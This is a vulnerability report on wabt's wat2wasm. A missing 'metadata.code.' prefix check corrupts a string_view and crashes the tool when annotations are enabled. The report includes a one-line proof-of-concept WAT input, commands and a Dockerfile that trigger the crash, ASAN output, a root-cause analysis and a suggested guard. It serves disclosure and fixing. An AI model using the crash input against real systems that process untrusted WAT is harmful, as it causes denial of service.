Description of the vulnerability and its impact
When wat2wasm processes a WAT file containing a @custom annotation inside a function
body (e.g. (@custom "a")), ParseCodeMetadataAnnotation calls name.remove_prefix(14)
on the token text "custom" (6 bytes) without first checking that the name starts with
"metadata.code.". This violates the C++ precondition for std::string_view::remove_prefix,
producing a corrupted string_view with a pointer advanced 14 bytes past the token
allocation and a length of 0xFFFFFFFFFFFFFFF8 (unsigned wraparound). The corrupted
view is stored in a CodeMetadataExpr node and later used as a key in
std::unordered_map<std::string_view, CodeMetadataSection> inside BinaryWriter::WriteExpr,
causing the hash function to attempt a read of ~18 exabytes from an invalid address.
Impact: Deterministic crash (DoS) of any pipeline running wat2wasm --enable-annotations
on untrusted input. The corrupted pointer is heap-relative, creating a theoretical (but
non-trivial) memory disclosure primitive.
First faulty condition: src/wast-parser.cc:2314 — name.remove_prefix(sizeof("metadata.code.") - 1) called without a prior starts_with("metadata.code.") guard.
Crash site: src/binary-writer.cc:1189 — BinaryWriter::WriteExpr hashes the corrupted string_view.
How to reproduce
echo '(module(func(@custom "a")))' > poc.wat
wat2wasm --enable-annotations poc.wat -o /dev/null
Crashes deterministically on current HEAD. No special heap layout or environment required.
ASAN output:
==10==ERROR: AddressSanitizer: SEGV on unknown address 0x603000010000
==10==The signal is caused by a READ memory access.
#0 in std::_Hash_bytes(void const*, unsigned long, unsigned long)
#1 in std::hash<std::string_view>::operator()
#2 in std::unordered_map<std::string_view, ...>::operator[]
#3 in wabt::(anonymous namespace)::BinaryWriter::WriteExpr /build/repo/src/binary-writer.cc:1189
#4 in BinaryWriter::WriteExprList /build/repo/src/binary-writer.cc:1203
#5 in BinaryWriter::WriteFunc /build/repo/src/binary-writer.cc:1229
#6 in BinaryWriter::WriteModule /build/repo/src/binary-writer.cc:1737
#7 in wabt::WriteBinaryModule /build/repo/src/binary-writer.cc:1947
#8 in ProgramMain /build/repo/src/tools/wat2wasm.cc:152
The following Dockerfile is a full end-to-end reproducer:
FROM ubuntu:24.04
ENV DEBIAN_FRONTEND=noninteractive
ENV TZ=UTC
RUN apt-get update && apt-get install -y --no-install-recommends \
git \
cmake \
ninja-build \
clang-18 \
llvm-18 \
libclang-rt-18-dev \
python3 \
ca-certificates \
&& rm -rf /var/lib/apt/lists/*
# Clone wabt at HEAD (unpatched as of April 2026)
RUN git clone --depth=1 --recurse-submodules https://github.com/WebAssembly/wabt.git /build/repo \
&& cd /build/repo && git log -1 --oneline
# Build wat2wasm with ASAN using clang-18
RUN mkdir -p /build/repo/build && \
cmake -S /build/repo -B /build/repo/build \
-GNinja \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_COMPILER=clang-18 \
-DCMAKE_CXX_COMPILER=clang++-18 \
"-DCMAKE_C_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
"-DCMAKE_CXX_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
"-DCMAKE_EXE_LINKER_FLAGS=-fsanitize=address" \
-DBUILD_TESTS=OFF \
&& ninja -C /build/repo/build wat2wasm
# Embed the PoC: 27-byte WAT text that triggers the bug
RUN echo '(module(func(@custom "a")))' > /build/poc.wat
# Show the vulnerable source region and then trigger the ASAN crash
CMD ["/bin/sh", "-c", \
"echo '=== Vulnerable source (src/wast-parser.cc — ParseCodeMetadataAnnotation) ===' && \
grep -n 'remove_prefix' /build/repo/src/wast-parser.cc | head -5 && \
echo '' && \
echo '=== ASAN crash ===' && \
ASAN_OPTIONS='detect_leaks=0:print_stacktrace=1' \
ASAN_SYMBOLIZER_PATH=$(which llvm-symbolizer-18) \
/build/repo/build/wat2wasm --enable-annotations /build/poc.wat -o /dev/null 2>&1; exit 1"]
Which WABT tools or library functions are affected
- Tool: wat2wasm
- Vulnerable function: WastParser::ParseCodeMetadataAnnotation (src/wast-parser.cc:2314)
- Crash site: BinaryWriter::WriteExpr (src/binary-writer.cc:1189)
Which WebAssembly features must be enabled
--enable-annotations — the crash is only reachable when annotation parsing is
enabled. The @custom token is only accepted under this flag.
Root Cause Analysis
Background
wabt's wat2wasm tool compiles WebAssembly Text Format (WAT) to binary. The --enable-annotations flag activates support for WAT annotations — syntactic extensions of the form (@name ...). One annotation type is metadata.code.*, used to attach custom metadata to instructions for toolchain pipelines. The annotation name must begin with the 14-byte prefix "metadata.code." for this feature to work correctly.
Vulnerable Code
// src/wast-parser.cc:2310, WastParser::ParseCodeMetadataAnnotation
Result WastParser::ParseCodeMetadataAnnotation(ExprList* exprs) {
  WABT_TRACE(ParseCodeMetadataAnnotation);
  Token tk = Consume();
  std::string_view name = tk.text();
  name.remove_prefix(sizeof("metadata.code.") - 1);  // line 2314: BUG
  std::string data_text;
  CHECK_RESULT(ParseQuotedText(&data_text, false));
  std::vector<uint8_t> data(data_text.begin(), data_text.end());
  exprs->push_back(std::make_unique<CodeMetadataExpr>(name, std::move(data)));
  EXPECT(Rpar);
  return Result::Ok;
}
Plain explanation: The function assumes that any annotation token reaching it begins with the 14-byte prefix "metadata.code." and strips that prefix unconditionally. When the token is "custom" (6 bytes), stripping 14 bytes is undefined behavior — it produces a string_view pointing past the end of the token buffer with a wrapped, near-maximal length.
Precise explanation: sizeof("metadata.code.") - 1 is 14. Calling remove_prefix(14) on a string_view of size 6 advances the internal data_ pointer by 14 bytes (into adjacent heap memory or lexer state) and sets size_ to 6 - 14 = -8, which as size_t is 0xFFFFFFFFFFFFFFF8. The resulting string_view is stored — without copying — into CodeMetadataExpr::name (a std::string_view member). At binary write time, BinaryWriter::WriteExpr uses this as a key in std::unordered_map<std::string_view, CodeMetadataSection>, which hashes the string_view by calling std::_Hash_impl::hash(data_ptr, 0xFFFFFFFFFFFFFFF8) — a read of ~18 exabytes from an invalid address, immediately caught by ASAN as a SEGV.
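The size arithmetic above can be checked in isolation. The following is a minimal sketch that reproduces only the unsigned subtraction, so it is well defined and never calls remove_prefix out of bounds. The helper name UncheckedRemainingSize and the constants are illustrative and do not exist in wabt; a 64-bit size type is assumed.

```cpp
#include <cstdint>
#include <string_view>

// Hypothetical helper (not part of wabt): the length a view of `size` bytes
// would report if `n` bytes were stripped with no bounds check. Only the
// arithmetic is modelled here; no out-of-range remove_prefix call is made.
constexpr std::uint64_t UncheckedRemainingSize(std::uint64_t size,
                                               std::uint64_t n) {
  return size - n;  // unsigned subtraction wraps modulo 2^64
}

// Length of the prefix the parser strips, excluding the terminating NUL.
constexpr std::uint64_t kPrefixLen = sizeof("metadata.code.") - 1;

// Length of the token text taken from the PoC annotation name.
constexpr std::uint64_t kTokenLen = std::string_view("custom").size();

static_assert(kPrefixLen == 14);
static_assert(kTokenLen == 6);
static_assert(UncheckedRemainingSize(kTokenLen, kPrefixLen) ==
              0xFFFFFFFFFFFFFFF8ULL);
```

The static_assert lines are evaluated at compile time, so a successful build confirms the wrapped length quoted in this report.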
The root cause is the absence of a guard in ParseCodeMetadataAnnotation verifying that the annotation name actually starts with "metadata.code." before calling remove_prefix. A corresponding guard exists at module level (in the lexer's annotation token accumulation), but not in the expression-level dispatcher.
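One possible shape for the missing guard is sketched below. This is not the upstream patch: StripCodeMetadataPrefix is a hypothetical standalone helper, and how the parser would report the failure is left to the caller. It uses substr for the comparison rather than starts_with so that it compiles as C++17.

```cpp
#include <optional>
#include <string_view>

// Hypothetical helper (not part of wabt): returns the annotation name with
// the "metadata.code." prefix removed, or std::nullopt when the name does
// not start with that prefix.
inline std::optional<std::string_view> StripCodeMetadataPrefix(
    std::string_view name) {
  constexpr std::string_view kPrefix = "metadata.code.";
  // substr(0, n) clamps n to the view's size, so this comparison is safe
  // even when `name` is shorter than the prefix.
  if (name.substr(0, kPrefix.size()) != kPrefix) {
    return std::nullopt;
  }
  // The precondition of remove_prefix (n <= size()) now holds.
  name.remove_prefix(kPrefix.size());
  return name;
}
```

With a check of this kind, the token text "custom" from the PoC would yield std::nullopt instead of a corrupted view, and the caller could presumably reject the annotation with a parse error before any CodeMetadataExpr is created.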